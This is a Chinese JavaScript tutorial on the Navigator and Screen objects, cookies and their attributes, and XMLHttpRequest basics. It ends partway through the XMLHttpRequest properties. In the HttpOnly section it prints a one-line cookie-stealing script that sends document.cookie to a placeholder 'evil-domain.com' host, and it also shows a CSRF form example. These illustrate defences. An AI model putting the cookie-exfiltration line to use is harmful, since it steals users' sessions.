JavaScript(七)(Navigator/Screen/Cookie/XMLHttpRequest/CORS)

JavaScript(七)(Navigator/Screen/Cookie/XMLHttpRequest/CORS)

文章目录

  • JavaScript(七)(Navigator/Screen/Cookie/XMLHttpRequest/CORS)
    • 56. Navigator 对象,Screen 对象。
      • 56.1 Navigator 对象的属性
        • 56.1.1 Navigator.userAgent
        • 56.1.2 Navigator.plugins
        • 56.1.3 Navigator.platform
        • 56.1.4 Navigator.onLine
        • 56.1.5 Navigator.language,Navigator.languages
        • 56.1.6 Navigator.geolocation
        • 56.1.7 Navigator.cookieEnabled
      • 56.2 Navigator 对象的方法
        • 56.2.1 Navigator.javaEnabled()
        • 56.2.2 Navigator.sendBeacon()
      • 56.3 Navigator 的实验性属性
        • 56.3.1 Navigator.deviceMemory
        • 56.3.2 Navigator.hardwareConcurrency
        • 56.3.3 Navigator.connection
      • 56.4 Screen 对象
    • 57. Cookie
      • 57.1 概述
      • 57.2 Cookie 与 HTTP 协议
        • 57.2.1 HTTP 回应:Cookie 的生成
        • 57.2.2 HTTP 请求:Cookie 的发送
      • 57.3 Cookie 的属性(==52.2 session 历史事件==)
        • 57.3.1 Expires,Max-Age
        • 57.3.2 Domain,Path
        • 57.3.3 Secure,HttpOnly
        • 57.3.4 SameSite
          • **(1)Strict**
          • **(2)Lax**
          • **(3)None**
      • 57.4 document.cookie
    • 58. XMLHttpRequest 对象(==AJAX==)
      • 58.1 简介
      • 58.2 XMLHttpRequest 的实例属性
        • 58.2.1 XMLHttpRequest.readyState
        • 58.2.2 XMLHttpRequest.onreadystatechange
        • 58.2.3 XMLHttpRequest.response
        • 58.2.4 XMLHttpRequest.responseType
        • 58.2.5 XMLHttpRequest.responseText
        • 58.2.6 XMLHttpRequest.responseXML
        • 58.2.7 XMLHttpRequest.responseURL
        • 58.2.8 XMLHttpRequest.status,XMLHttpRequest.statusText
        • 58.2.9 XMLHttpRequest.timeout,XMLHttpRequestEventTarget.ontimeout
        • 58.2.10 事件监听属性(on-**)
        • 58.2.11 XMLHttpRequest.withCredentials
        • 58.2.12 XMLHttpRequest.upload
      • 58.3 XMLHttpRequest 的实例方法
        • 58.3.1 XMLHttpRequest.open()
        • 58.3.2 XMLHttpRequest.send()
        • 58.3.3 XMLHttpRequest.setRequestHeader()
        • 58.3.4 XMLHttpRequest.overrideMimeType()
        • 58.3.5 XMLHttpRequest.getResponseHeader()
        • 58.3.6 XMLHttpRequest.getAllResponseHeaders()
        • 58.3.7 XMLHttpRequest.abort()
      • 58.4 XMLHttpRequest 实例的事件
        • 58.4.1 readyStateChange 事件
        • 58.4.2 progress 事件
        • 58.4.3 load 事件、error 事件、abort 事件
        • 58.4.4 loadend 事件
        • 58.4.5 timeout 事件
      • 58.5 Navigator.sendBeacon()
    • 59. 同源限制
      • 59.1 概述
        • 59.1.1 含义
        • 59.1.2 目的
        • 59.1.3 限制范围
      • 59.2 Cookie
      • 59.3 iframe 和多窗口通信
        • 59.3.1 片段识别符 fragment identifier
        • 59.3.2 window.postMessage()(==message-.source .origin==)
        • 59.3.3 LocalStorage
      • 59.4 AJAX
        • 59.4.1 JSONP
        • 59.4.2 WebSocket
        • 59.4.3 CORS
    • 60. CORS 通信
      • 60.1 简介
      • 60.2 两种请求
      • 60.3 简单请求
        • 60.3.1 基本流程
          • **(1)`Access-Control-Allow-Origin`**
          • **(2)`Access-Control-Allow-Credentials`**
          • **(3)`Access-Control-Expose-Headers`**
        • 60.3.2 withCredentials 属性
      • 60.4 非简单请求
        • 60.4.1 预检请求
          • **(1)`Access-Control-Request-Method`**
          • **(2)`Access-Control-Request-Headers`**
        • 60.4.2 预检请求的回应
          • **(1)`Access-Control-Allow-Methods`**
          • **(2)`Access-Control-Allow-Headers`**
          • **(3)`Access-Control-Allow-Credentials`**
          • **(4)`Access-Control-Max-Age`**
        • 60.4.3 浏览器的正常请求和回应
      • 60.5 与 JSONP 的比较

56. Navigator 对象,Screen 对象。

window.navigator属性指向一个包含浏览器和系统信息的 Navigator 对象。脚本通过这个属性了解用户的环境信息

56.1 Navigator 对象的属性

56.1.1 Navigator.userAgent

navigator.userAgent属性返回浏览器的 User Agent 字符串,表示浏览器的厂商和版本信息。

下面是 Chrome 浏览器的userAgent

navigator.userAgent
// "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36"

通过userAgent属性识别浏览器,不是一个好办法。因为必须考虑所有的情况(不同的浏览器,不同的版本),非常麻烦,而且用户可以改变这个字符串。这个字符串的格式并无统一规定,也无法保证未来的适用性,各种上网设备层出不穷,难以穷尽。所以,现在一般不再通过它识别浏览器了,而是使用“功能识别”方法,即逐一测试当前浏览器是否支持要用到的 JavaScript 功能。

不过,通过userAgent可以大致准确地识别手机浏览器,方法就是测试是否包含mobi字符串。

var ua = navigator.userAgent.toLowerCase();

if (/mobi/i.test(ua)) {
     
  // 手机浏览器
} else {
     
  // 非手机浏览器
}

如果想要识别所有移动设备的浏览器,可以测试更多的特征字符串。

/mobi|android|touch|mini/i.test(ua)

56.1.2 Navigator.plugins

Navigator.plugins属性返回一个类似数组的对象,成员是 Plugin 实例对象,表示浏览器安装的插件,比如 Flash、ActiveX 等。

var pluginsLength = navigator.plugins.length;

for (var i = 0; i < pluginsLength; i++) {
     
  console.log(navigator.plugins[i].name);
  console.log(navigator.plugins[i].filename);
  console.log(navigator.plugins[i].description);
  console.log(navigator.plugins[i].version);
}

56.1.3 Navigator.platform

Navigator.platform属性返回用户的操作系统信息,比如MacIntelWin32Linux x86_64等 。

navigator.platform
// "Linux x86_64"

56.1.4 Navigator.onLine

navigator.onLine属性返回一个布尔值,表示用户当前在线还是离线(浏览器断线)。

navigator.onLine // true

有时,浏览器可以连接局域网,但是局域网不能连通外网。这时,有的浏览器的onLine属性会返回true,所以不能假定只要是true,用户就一定能访问互联网。不过,如果是false,可以断定用户一定离线。

用户变成在线会触发online事件,变成离线会触发offline事件,可以通过window.ononlinewindow.onoffline指定这两个事件的回调函数。

window.addEventListener('offline', function(e) {
      console.log('offline'); });
window.addEventListener('online', function(e) {
      console.log('online'); });

56.1.5 Navigator.language,Navigator.languages

Navigator.language属性返回一个字符串,表示浏览器的首选语言。该属性只读。

navigator.language // "en"

Navigator.languages属性返回一个数组,表示用户可以接受的语言。Navigator.language总是这个数组的第一个成员。HTTP 请求头信息的Accept-Language字段,就来自这个数组。

navigator.languages  // ["en-US", "en", "zh-CN", "zh", "zh-TW"]

如果这个属性发生变化,就会在window对象上触发languagechange事件。

56.1.6 Navigator.geolocation

Navigator.geolocation属性返回一个 Geolocation 对象,包含用户地理位置的信息。注意,该 API 只有在 HTTPS 协议下可用,否则调用下面方法时会报错。

Geolocation 对象提供下面三个方法。

  • Geolocation.getCurrentPosition():得到用户的当前位置
  • Geolocation.watchPosition():监听用户位置变化
  • Geolocation.clearWatch():取消watchPosition()方法指定的监听函数

注意,调用这三个方法时,浏览器会跳出一个对话框,要求用户给予授权。

56.1.7 Navigator.cookieEnabled

navigator.cookieEnabled属性返回一个布尔值,表示浏览器的 Cookie 功能是否打开。

navigator.cookieEnabled // true

注意,这个属性反映的是浏览器总的特性,与是否储存某个具体的网站的 Cookie 无关。用户可以设置某个网站不得储存 Cookie,这时cookieEnabled返回的还是true

56.2 Navigator 对象的方法

56.2.1 Navigator.javaEnabled()

navigator.javaEnabled()方法返回一个布尔值,表示浏览器是否能运行 Java Applet 小程序。

navigator.javaEnabled() // false

56.2.2 Navigator.sendBeacon()

Navigator.sendBeacon()方法用于向服务器异步发送数据,详见《XMLHttpRequest 对象》一章。

56.3 Navigator 的实验性属性

Navigator 对象有一些实验性属性,在部分浏览器可用。

56.3.1 Navigator.deviceMemory

navigator.deviceMemory属性返回当前计算机的内存数量(单位为 GB)。该属性只读,只在 HTTPS 环境下可用。

它的返回值是一个近似值,四舍五入到最接近的2的幂,通常是 0.25、0.5、1、2、4、8。实际内存超过 8GB,也返回8

if (navigator.deviceMemory > 1) {
     
  await import('./costly-module.js');
}

上面示例中,只有当前内存大于 1GB,才加载大型的脚本。

56.3.2 Navigator.hardwareConcurrency

navigator.hardwareConcurrency属性返回用户计算机上可用的逻辑处理器的数量。该属性只读。

现代计算机的 CPU 有多个物理核心,每个物理核心有时支持一次运行多个线程。因此,四核 CPU 可以提供八个逻辑处理器核心。

if (navigator.hardwareConcurrency > 4) {
     
  await import('./costly-module.js');
}

上面示例中,可用的逻辑处理器大于4,才会加载大型脚本。

该属性通过用于创建 Web Worker,每个可用的逻辑处理器都创建一个 Worker。

let workerList = [];

for (let i = 0; i < window.navigator.hardwareConcurrency; i++) {
     
  let newWorker = {
     
    worker: new Worker('cpuworker.js'),
    inUse: false
  };
  workerList.push(newWorker);
}

上面示例中,有多少个可用的逻辑处理器,就创建多少个 Web Worker。

56.3.3 Navigator.connection

navigator.connection属性返回一个对象,包含当前网络连接的相关信息。

  • downlink:有效带宽估计值(单位:兆比特/秒,Mbps),四舍五入到每秒 25KB 的最接近倍数。
  • downlinkMax:当前连接的最大下行链路速度(单位:兆比特每秒,Mbps)。
  • effectiveType:返回连接的等效类型,可能的值为slow-2g2g3g4g
  • rtt:当前连接的估计有效往返时间,四舍五入到最接近的25毫秒的倍数。
  • saveData:用户是否设置了浏览器的减少数据使用量选项(比如不加载图片),返回true或者false
  • type:当前连接的介质类型,可能的值为bluetoothcellularethernetnonewifiwimaxotherunknown
if (navigator.connection.effectiveType === '4g') {
     
  await import('./costly-module.js');
}

上面示例中,如果网络连接是 4G,则加载大型脚本。

56.4 Screen 对象

Screen 对象表示当前窗口所在的屏幕,提供显示设备的信息。window.screen属性指向这个对象。

该对象有下面的属性。

  • Screen.height:浏览器窗口所在的屏幕的高度(单位像素)。除非调整显示器的分辨率,否则这个值可以看作常量,不会发生变化。显示器的分辨率与浏览器设置无关,缩放网页并不会改变分辨率。
  • Screen.width:浏览器窗口所在的屏幕的宽度(单位像素)。
  • Screen.availHeight:浏览器窗口可用的屏幕高度(单位像素)。因为部分空间可能不可用,比如系统的任务栏或者 Mac 系统屏幕底部的 Dock 区,这个属性等于height减去那些被系统组件的高度。
  • Screen.availWidth:浏览器窗口可用的屏幕宽度(单位像素)。
  • Screen.pixelDepth:整数,表示屏幕的色彩位数,比如24表示屏幕提供24位色彩。
  • Screen.colorDepthScreen.pixelDepth的别名。严格地说,colorDepth 表示应用程序的颜色深度,pixelDepth 表示屏幕的颜色深度,绝大多数情况下,它们都是同一件事。
  • Screen.orientation:返回一个对象,表示屏幕的方向。该对象的type属性是一个字符串,表示屏幕的具体方向,landscape-primary表示横放,landscape-secondary表示颠倒的横放,portrait-primary表示竖放,portrait-secondary表示颠倒的竖放。

下面是Screen.orientation的例子。

window.screen.orientation
// { angle: 0, type: "landscape-primary", onchange: null }

下面的例子保证屏幕分辨率大于 1024 x 768。

if (window.screen.width >= 1024 && window.screen.height >= 768) {
     
  // 分辨率不低于 1024x768
}

下面是根据屏幕的宽度,将用户导向不同网页的代码。

if ((screen.width <= 800) && (screen.height <= 600)) {
     
  window.location.replace('small.html');
} else {
     
  window.location.replace('wide.html');
}

57. Cookie

57.1 概述

Cookie 是服务器保存在浏览器的一小段文本信息,一般大小不能超过4KB。浏览器每次向服务器发出请求,就会自动附上这段信息。

Cookie 主要保存状态信息,以下是一些主要用途。

  • 对话(session)管理:保存登录、购物车等需要记录的信息。
  • 个性化信息:保存用户的偏好,比如网页的字体大小、背景色等等。
  • 追踪用户:记录和分析用户行为。

Cookie 不是一种理想的客户端储存机制。它的容量很小(4KB),缺乏数据操作接口,而且会影响性能。客户端储存应该使用 Web storage API 和 IndexedDB。只有那些每次请求都需要让服务器知道的信息,才应该放在 Cookie 里面。

每个 Cookie 都有以下几方面的元数据。

  • Cookie 的名字
  • Cookie 的值(真正的数据写在这里面)
  • 到期时间(超过这个时间会失效)
  • 所属域名(默认为当前域名)
  • 生效的路径(默认为当前网址)

举例来说,用户访问网址www.example.com,服务器在浏览器写入一个 Cookie。这个 Cookie 的所属域名为www.example.com,生效路径为根路径/。如果 Cookie 的生效路径设为/forums,那么这个 Cookie 只有在访问www.example.com/forums及其子路径时才有效。以后,浏览器访问某个路径之前,就会找出对该域名和路径有效,并且还没有到期的 Cookie,一起发送给服务器

用户可以设置浏览器不接受 Cookie,也可以设置不向服务器发送 Cookie。window.navigator.cookieEnabled属性返回一个布尔值,表示浏览器是否打开 Cookie 功能。

window.navigator.cookieEnabled // true

document.cookie属性返回当前网页的 Cookie。

document.cookie // "id=foo;key=bar"

不同浏览器对 Cookie 数量和大小的限制,是不一样的。一般来说,单个域名设置的 Cookie 不应超过30个,每个 Cookie 的大小不能超过4KB。超过限制以后,Cookie 将被忽略,不会被设置。

浏览器的同源政策规定,两个网址只要域名相同,就可以共享 Cookie(参见《同源政策》一章)。注意,这里不要求协议相同。也就是说,http://example.com设置的 Cookie,可以被https://example.com读取。

57.2 Cookie 与 HTTP 协议

Cookie 由 HTTP 协议生成,也主要是供 HTTP 协议使用。

57.2.1 HTTP 回应:Cookie 的生成

服务器如果希望在浏览器保存 Cookie,就要在 HTTP 回应的头信息里面,放置一个Set-Cookie字段。

Set-Cookie:foo=bar

上面代码会在浏览器保存一个名为foo的 Cookie,它的值为bar

HTTP 回应可以包含多个Set-Cookie字段,即在浏览器生成多个 Cookie。下面是一个例子。

HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco
Set-Cookie: tasty_cookie=strawberry

[page content]

除了 Cookie 的值,Set-Cookie字段还可以附加 Cookie 的属性。

Set-Cookie: <cookie-name>=<cookie-value>; Expires=<date>
Set-Cookie: <cookie-name>=<cookie-value>; Max-Age=<non-zero-digit>
Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>
Set-Cookie: <cookie-name>=<cookie-value>; Path=<path-value>
Set-Cookie: <cookie-name>=<cookie-value>; Secure
Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly

上面的几个属性的含义,将在后文解释。

一个Set-Cookie字段里面,可以同时包括多个属性,没有次序的要求。

Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Secure; HttpOnly

下面是一个例子。

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly

如果服务器想改变一个早先设置的 Cookie,必须同时满足四个条件:Cookie 的keydomainpathsecure都匹配。举例来说,如果原始的 Cookie 是用如下的Set-Cookie设置的。

Set-Cookie: key1=value1; domain=example.com; path=/blog

改变上面这个 Cookie 的值,就必须使用同样的Set-Cookie

Set-Cookie: key1=value2; domain=example.com; path=/blog

只要有一个属性不同,就会生成一个全新的 Cookie,而不是替换掉原来那个 Cookie。

Set-Cookie: key1=value2; domain=example.com; path=/

上面的命令设置了一个全新的同名 Cookie,但是path属性不一样。下一次访问example.com/blog的时候,浏览器将向服务器发送两个同名的 Cookie。

Cookie: key1=value1; key1=value2

上面代码的两个 Cookie 是同名的,匹配越精确的 Cookie 排在越前面。

57.2.2 HTTP 请求:Cookie 的发送

浏览器向服务器发送 HTTP 请求时,每个请求都会带上相应的 Cookie。也就是说,把服务器早前保存在浏览器的这段信息,再发回服务器。这时要使用 HTTP 头信息的Cookie字段。

Cookie: foo=bar

上面代码会向服务器发送名为foo的 Cookie,值为bar

Cookie字段可以包含多个 Cookie,使用分号(;)分隔。

Cookie: name=value; name2=value2; name3=value3

下面是一个例子。

GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry

服务器收到浏览器发来的 Cookie 时,有两点是无法知道的。

  • Cookie 的各种属性,比如何时过期。
  • 哪个域名设置的 Cookie,到底是一级域名设的,还是某一个二级域名设的。

57.3 Cookie 的属性(52.2 session 历史事件)

57.3.1 Expires,Max-Age

Expires属性指定一个具体的到期时间,到了指定时间以后,浏览器就不再保留这个 Cookie。它的值是 UTC 格式,可以使用Date.prototype.toUTCString()进行格式转换。

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT;

如果不设置该属性,或者设为null,Cookie 只在当前会话(session)有效,浏览器窗口一旦关闭,当前 Session 结束,该 Cookie 就会被删除。另外,浏览器根据本地时间,决定 Cookie 是否过期,由于本地时间是不精确的,所以没有办法保证 Cookie 一定会在服务器指定的时间过期。

Max-Age属性指定从现在开始 Cookie 存在的秒数,比如60 * 60 * 24 * 365(即一年)。过了这个时间以后,浏览器就不再保留这个 Cookie。

如果同时指定了ExpiresMax-Age,那么Max-Age的值将优先生效。

如果Set-Cookie字段没有指定ExpiresMax-Age属性,那么这个 Cookie 就是 Session Cookie,即它只在本次对话存在,一旦用户关闭浏览器,浏览器就不会再保留这个 Cookie。

57.3.2 Domain,Path

Domain属性指定浏览器发出 HTTP 请求时,哪些域名要附带这个 Cookie。如果没有指定该属性,浏览器会默认将其设为当前域名,这时子域名将不会附带这个 Cookie。比如,example.com不设置 Cookie 的domain属性,那么sub.example.com将不会附带这个 Cookie。如果指定了domain属性,那么子域名也会附带这个 Cookie。如果服务器指定的域名不属于当前域名,浏览器会拒绝这个 Cookie。

Path属性指定浏览器发出 HTTP 请求时,哪些路径要附带这个 Cookie。只要浏览器发现,Path属性是 HTTP 请求路径的开头一部分,就会在头信息里面带上这个 Cookie。比如,PATH属性是/,那么请求/docs路径也会包含该 Cookie。当然,前提是域名必须一致。

57.3.3 Secure,HttpOnly

Secure属性指定浏览器只有在加密协议 HTTPS 下,才能将这个 Cookie 发送到服务器。另一方面,如果当前协议是 HTTP,浏览器会自动忽略服务器发来的Secure属性。该属性只是一个开关,不需要指定值。如果通信是 HTTPS 协议,该开关自动打开。

HttpOnly属性指定该 Cookie 无法通过 JavaScript 脚本拿到,主要是document.cookie属性、XMLHttpRequest对象和 Request API 都拿不到该属性。这样就防止了该 Cookie 被脚本读到,只有浏览器发出 HTTP 请求时,才会带上该 Cookie。

(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

上面是跨站点载入的一个恶意脚本的代码,能够将当前网页的 Cookie 发往第三方服务器。如果设置了一个 Cookie 的HttpOnly属性,上面代码就不会读到该 Cookie。

57.3.4 SameSite

Chrome 51 开始,浏览器的 Cookie 新增加了一个SameSite属性,用来防止 CSRF 攻击和用户追踪。

Cookie 往往用来存储用户的身份信息,恶意网站可以设法伪造带有正确 Cookie 的 HTTP 请求,这就是 CSRF 攻击。举例来说,用户登陆了银行网站your-bank.com,银行服务器发来了一个 Cookie。

Set-Cookie:id=a3fWa;

用户后来又访问了恶意网站malicious.com,上面有一个表单。

<form action="your-bank.com/transfer" method="POST">
  ...
</form>

用户一旦被诱骗发送这个表单,银行网站就会收到带有正确 Cookie 的请求。为了防止这种攻击,表单一般都带有一个随机 token,告诉服务器这是真实请求。

<form action="your-bank.com/transfer" method="POST">
  <input type="hidden" name="token" value="dad3weg34">
  ...
</form>

这种第三方网站引导发出的 Cookie,就称为第三方 Cookie。它除了用于 CSRF 攻击,还可以用于用户追踪。比如,Facebook 在第三方网站插入一张看不见的图片。

<img src="facebook.com" style="visibility:hidden;">

浏览器加载上面代码时,就会向 Facebook 发出带有 Cookie 的请求,从而 Facebook 就会知道你是谁,访问了什么网站。

Cookie 的SameSite属性用来限制第三方 Cookie,从而减少安全风险。它可以设置三个值。

  • Strict
  • Lax
  • None
(1)Strict

Strict最为严格,完全禁止第三方 Cookie,跨站点时,任何情况下都不会发送 Cookie。换言之,只有当前网页的 URL 与请求目标一致,才会带上 Cookie。

Set-Cookie: CookieName=CookieValue; SameSite=Strict;

这个规则过于严格,可能造成非常不好的用户体验。比如,当前网页有一个 GitHub 链接,用户点击跳转就不会带有 GitHub 的 Cookie,跳转过去总是未登陆状态。

(2)Lax

Lax规则稍稍放宽,大多数情况也是不发送第三方 Cookie,但是导航到目标网址的 Get 请求除外。

Set-Cookie: CookieName=CookieValue; SameSite=Lax;

导航到目标网址的 GET 请求,只包括三种情况:链接,预加载请求,GET 表单。详见下表。

请求类型 示例 正常情况 Lax
链接 发送 Cookie 发送 Cookie
预加载 发送 Cookie 发送 Cookie
GET 表单
发送 Cookie 发送 Cookie
POST 表单 发送 Cookie 不发送
iframe 发送 Cookie 不发送
AJAX $.get("...") 发送 Cookie 不发送
Image 发送 Cookie 不发送

**设置了StrictLax以后,基本就杜绝了 CSRF 攻击。**当然,前提是用户浏览器支持 SameSite 属性。

(3)None

Chrome 计划将Lax变为默认设置。这时,网站可以选择显式关闭SameSite属性,将其设为None。不过,前提是必须同时设置Secure属性(Cookie 只能通过 HTTPS 协议发送),否则无效。

下面的设置无效。

Set-Cookie: widget_session=abc123; SameSite=None

下面的设置有效。

Set-Cookie: widget_session=abc123; SameSite=None; Secure

57.4 document.cookie

document.cookie属性用于读写当前网页的 Cookie。

读取的时候,它会返回当前网页的所有 Cookie,前提是该 Cookie 不能有HTTPOnly属性。

document.cookie // "foo=bar;baz=bar"

上面代码从document.cookie一次性读出两个 Cookie,它们之间使用分号分隔。必须手动还原,才能取出每一个 Cookie 的值。

var cookies = document.cookie.split(';');

for (var i = 0; i < cookies.length; i++) {
     
  console.log(cookies[i]);
}
// foo=bar
// baz=bar

document.cookie属性是可写的,可以通过它为当前网站添加 Cookie。

document.cookie = 'fontSize=14';

写入的时候,Cookie 的值必须写成key=value的形式。注意,等号两边不能有空格。另外,写入 Cookie 的时候,必须对分号、逗号和空格进行转义(它们都不允许作为 Cookie 的值),这可以用encodeURIComponent方法达到。

但是,document.cookie一次只能写入一个 Cookie,而且写入并不是覆盖,而是添加。

document.cookie = 'test1=hello';
document.cookie = 'test2=world';
document.cookie
// test1=hello;test2=world

document.cookie读写行为的差异(一次可以读出全部 Cookie,但是只能写入一个 Cookie),与 HTTP 协议的 Cookie 通信格式有关。浏览器向服务器发送 Cookie 的时候,Cookie字段是使用一行将所有 Cookie 全部发送;服务器向浏览器设置 Cookie 的时候,Set-Cookie字段是一行设置一个 Cookie。

写入 Cookie 的时候,可以一起写入 Cookie 的属性。

document.cookie = "foo=bar; expires=Fri, 31 Dec 2020 23:59:59 GMT";

上面代码中,写入 Cookie 的时候,同时设置了expires属性。属性值的等号两边,也是不能有空格的。

各个属性的写入注意点如下。

  • path属性必须为绝对路径,默认为当前路径。
  • domain属性值必须是当前发送 Cookie 的域名的一部分。比如,当前域名是example.com,就不能将其设为foo.com。该属性默认为当前的一级域名(不含二级域名)。
  • max-age属性的值为秒数
  • expires属性的值为 UTC 格式,可以使用Date.prototype.toUTCString()进行日期格式转换。

document.cookie写入 Cookie 的例子如下。

document.cookie = 'fontSize=14; '
  + 'expires=' + someDate.toGMTString() + '; '
  + 'path=/subdirectory; '
  + 'domain=*.example.com';

Cookie 的属性一旦设置完成,就没有办法读取这些属性的值。

删除一个现存 Cookie 的唯一方法,是设置它的expires属性为一个过去的日期

document.cookie = 'fontSize=;expires=Thu, 01-Jan-1970 00:00:01 GMT';

上面代码中,名为fontSize的 Cookie 的值为空,过期时间设为1970年1月1月零点,就等同于删除了这个 Cookie。

58. XMLHttpRequest 对象(AJAX)

58.1 简介

浏览器与服务器之间,采用 HTTP 协议通信。用户在浏览器地址栏键入一个网址,或者通过网页表单向服务器提交内容,这时浏览器就会向服务器发出 HTTP 请求。

1999年,微软公司发布 IE 浏览器5.0版,第一次引入新功能:允许 JavaScript 脚本向服务器发起 HTTP 请求。这个功能当时并没有引起注意,直到2004年 Gmail 发布和2005年 Google Map 发布,才引起广泛重视。2005年2月,==AJAX 这个词第一次正式提出,它是 Asynchronous JavaScript and XML 的缩写,指的是通过 JavaScript 的异步通信,从服务器获取 XML 文档从中提取数据,再更新当前网页的对应部分,而不用刷新整个网页。后来,AJAX 这个词就成为 JavaScript 脚本发起 HTTP 通信的代名词,也就是说,只要用脚本发起通信,就可以叫做 AJAX 通信。==W3C 也在2006年发布了它的国际标准。

具体来说,AJAX 包括以下几个步骤。

  1. 创建 XMLHttpRequest 实例
  2. 发出 HTTP 请求
  3. 接收服务器传回的数据
  4. 更新网页数据

概括起来,就是一句话,AJAX 通过原生的XMLHttpRequest对象发出 HTTP 请求,得到服务器返回的数据后,再进行处理。现在,服务器返回的都是 JSON 格式的数据,XML 格式已经过时了,但是 AJAX 这个名字已经成了一个通用名词,字面含义已经消失了。

XMLHttpRequest对象是 AJAX 的主要接口,用于浏览器与服务器之间的通信。尽管名字里面有XMLHttp,它实际上可以使用多种协议(比如fileftp),发送任何格式的数据(包括字符串和二进制)。

XMLHttpRequest本身是一个构造函数,可以使用new命令生成实例。它没有任何参数。

var xhr = new XMLHttpRequest();

一旦新建实例,就可以使用open()方法指定建立 HTTP 连接的一些细节。

xhr.open('GET', 'http://www.example.com/page.php', true);

上面代码指定使用 GET 方法,跟指定的服务器网址建立连接。第三个参数true,表示请求是异步的。

然后,指定回调函数,监听通信状态(readyState属性)的变化。

xhr.onreadystatechange = handleStateChange;

function handleStateChange() {
     
  // ...
}

上面代码中,一旦XMLHttpRequest实例的状态发生变化,就会调用监听函数handleStateChange

最后使用send()方法,实际发出请求。

xhr.send(null);

上面代码中,send()的参数为null,表示发送请求的时候,不带有数据体。如果发送的是 POST 请求,这里就需要指定数据体。

一旦拿到服务器返回的数据,AJAX 不会刷新整个网页,而是只更新网页里面的相关部分,从而不打断用户正在做的事情。

注意,AJAX 只能向同源网址(协议、域名、端口都相同)发出 HTTP 请求,如果发出跨域请求,就会报错(详见《同源政策》和《CORS 通信》两章)。

下面是XMLHttpRequest对象简单用法的完整例子

var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function(){
     
  // 通信成功时,状态值为4
  if (xhr.readyState === 4){
     
    if (xhr.status === 200){
     
      console.log(xhr.responseText);
    } else {
     
      console.error(xhr.statusText);
    }
  }
};

xhr.onerror = function (e) {
     
  console.error(xhr.statusText);
};

xhr.open('GET', '/endpoint', true);
xhr.send(null);

58.2 XMLHttpRequest 的实例属性

58.2.1 XMLHttpRequest.readyState

XMLHttpRequest.readyState返回一个整数,表示实例对象的当前状态。该属性只读。它可能返回以下值。

  • 0,表示 XMLHttpRequest 实例已经生成,但是实例的open()方法还没有被调用。
  • 1,表示open()方法已经调用,但是实例的send()方法还没有调用,仍然可以使用实例的setRequestHeader()方法,设定 HTTP 请求的头信息。
  • 2,表示实例的send()方法已经调用,并且服务器返回的头信息和状态码已经收到。
  • 3,表示正在接收服务器传来的数据体(body 部分)。这时,如果实例的responseType属性等于text或者空字符串,responseText属性就会包含已经收到的部分信息。
  • 4,表示服务器返回的数据已经完全接收,或者本次接收已经失败。

通信过程中,每当实例对象发生状态变化,它的readyState属性的值就会改变。这个值每一次变化,都会触发readyStateChange事件。

var xhr = new XMLHttpRequest();

if (xhr.readyState === 4) {
     
  // 请求结束,处理服务器返回的数据
} else {
     
  // 显示提示“加载中……”
}

上面代码中,xhr.readyState等于4时,表明脚本发出的 HTTP 请求已经完成。其他情况,都表示 HTTP 请求还在进行中。

58.2.2 XMLHttpRequest.onreadystatechange

XMLHttpRequest.onreadystatechange属性指向一个监听函数readystatechange事件发生时(实例的readyState属性变化),就会执行这个属性。

另外,如果使用实例的abort()方法,终止 XMLHttpRequest 请求,也会造成readyState属性变化,导致调用XMLHttpRequest.onreadystatechange属性。

下面是一个例子。

var xhr = new XMLHttpRequest();
xhr.open( 'GET', 'http://example.com' , true );
xhr.onreadystatechange = function () {
     
  if (xhr.readyState !== 4 || xhr.status !== 200) {
     
    return;
  }
  console.log(xhr.responseText);
};
xhr.send();

58.2.3 XMLHttpRequest.response

XMLHttpRequest.response属性表示服务器返回的数据体(即 HTTP 回应的 body 部分)。它可能是任何数据类型,比如字符串、对象、二进制对象等等,具体的类型由XMLHttpRequest.responseType属性决定。该属性只读。

如果本次请求没有成功或者数据不完整,该属性等于null。但是,如果responseType属性等于text或空字符串,在请求没有结束之前(readyState等于3的阶段),response属性包含服务器已经返回的部分数据。

var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function () {
     
  if (xhr.readyState === 4) {
     
    handler(xhr.response);
  }
}

58.2.4 XMLHttpRequest.responseType

XMLHttpRequest.responseType属性是一个字符串,表示服务器返回数据的类型。这个属性是可写的,可以在调用open()方法之后、调用send()方法之前,设置这个属性的值,告诉浏览器如何解读返回的数据。如果responseType设为空字符串,就等同于默认值text

XMLHttpRequest.responseType属性可以等于以下值。

  • “”(空字符串):等同于text,表示服务器返回文本数据。
  • “arraybuffer”:ArrayBuffer 对象,表示服务器返回二进制数组。
  • “blob”:Blob 对象,表示服务器返回二进制对象。
  • “document”:Document 对象,表示服务器返回一个文档对象。
  • “json”:JSON 对象。
  • “text”:字符串。

上面几种类型之中,text类型适合大多数情况,而且直接处理文本也比较方便。document类型适合返回 HTML / XML 文档的情况,这意味着,对于那些打开 CORS 的网站,可以直接用 Ajax 抓取网页,然后不用解析 HTML 字符串,直接对抓取回来的数据进行 DOM 操作。blob类型适合读取二进制数据,比如图片文件。

var xhr = new XMLHttpRequest();
xhr.open('GET', '/path/to/image.png', true);
xhr.responseType = 'blob';

xhr.onload = function(e) {
     
  if (this.status === 200) {
     
    var blob = new Blob([xhr.response], {
     type: 'image/png'});
    // 或者
    var blob = xhr.response;
  }
};

xhr.send();

如果将这个属性设为ArrayBuffer,就可以按照数组的方式处理二进制数据。

var xhr = new XMLHttpRequest();
xhr.open('GET', '/path/to/image.png', true);
xhr.responseType = 'arraybuffer';

xhr.onload = function(e) {
     
  var uInt8Array = new Uint8Array(this.response);
  for (var i = 0, len = uInt8Array.length; i < len; ++i) {
     
    // var byte = uInt8Array[i];
  }
};

xhr.send();

如果将这个属性设为json,浏览器就会自动对返回数据调用JSON.parse()方法。也就是说,从xhr.response属性(注意,不是xhr.responseText属性)得到的不是文本,而是一个 JSON 对象。
